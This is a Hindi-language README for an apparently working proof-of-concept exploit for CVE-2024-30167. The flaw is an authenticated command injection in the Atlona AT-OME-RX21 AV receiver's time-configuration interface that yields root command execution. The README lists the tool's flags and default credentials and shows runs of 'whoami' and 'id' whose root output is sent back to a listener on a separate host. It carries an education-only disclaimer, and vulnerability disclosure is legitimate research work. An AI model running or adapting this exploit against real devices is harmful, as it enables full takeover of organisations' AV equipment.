
एटलोना AT-OME-RX21 में प्रमाणित कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो समय कॉन्फ़िगरेशन इंटरफ़ेस के माध्यम से रूट-स्तरीय कमांड निष्पादन की अनुमति देता है।
अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इस कोड का उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। मैं किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हूँ।
Atlona AT-OME-RX21 AV स्विचर के समय कॉन्फ़िगरेशन इंटरफ़ेस में एक प्रमाणित कमांड इंजेक्शन भेद्यता मौजूद है। वैध क्रेडेंशियल वाला उपयोगकर्ता ऑपरेटिंग सिस्टम कमांड इंजेक्ट कर सकता है जो root के रूप में निष्पादित होते हैं, जिससे पूर्ण सिस्टम से समझौता हो जाता है।
Atlona AT-OME-RX21 एक AV (ऑडियो/विज़ुअल) रिसीवर और स्केलर है जो पेशेवर वीडियो कॉन्फ्रेंसिंग और सहयोग वातावरण के लिए डिज़ाइन किया गया है। इसका उपयोग ज्यादातर कॉन्फ्रेंस रूम, कक्षाओं और हडल स्पेस में किया जाता है। यह लैपटॉप/कॉन्फ्रेंसिंग सिस्टम जैसे उपकरणों को डिस्प्ले से जोड़ने में मदद करता है।
यह PoC सभी फर्मवेयर संस्करणों <= 1.5.1 के विरुद्ध काम करता है
विक्रेता जानकारी: https://atlona.com/product/at-ome-rx21/
$ .\cve-2024-30167.exe -h
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Usage of cve-2024-30167.exe:
-P string
listening port for command output (default "4444")
-c string
Command to execute on the target
-l string
listening host for command output
-p string
Password for authentication (default "Atlona")
-t string
Target URL (e.g: http://example.com)
-u string
Username for authentication (default "admin")
go build -o <OUTPUT_FILENAME>
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
root
$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)
उपरोक्त कमांड डिवाइस में लॉग इन करने के लिए डिफ़ॉल्ट क्रेडेंशियल का उपयोग करता है।
सिंटैक्स:
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>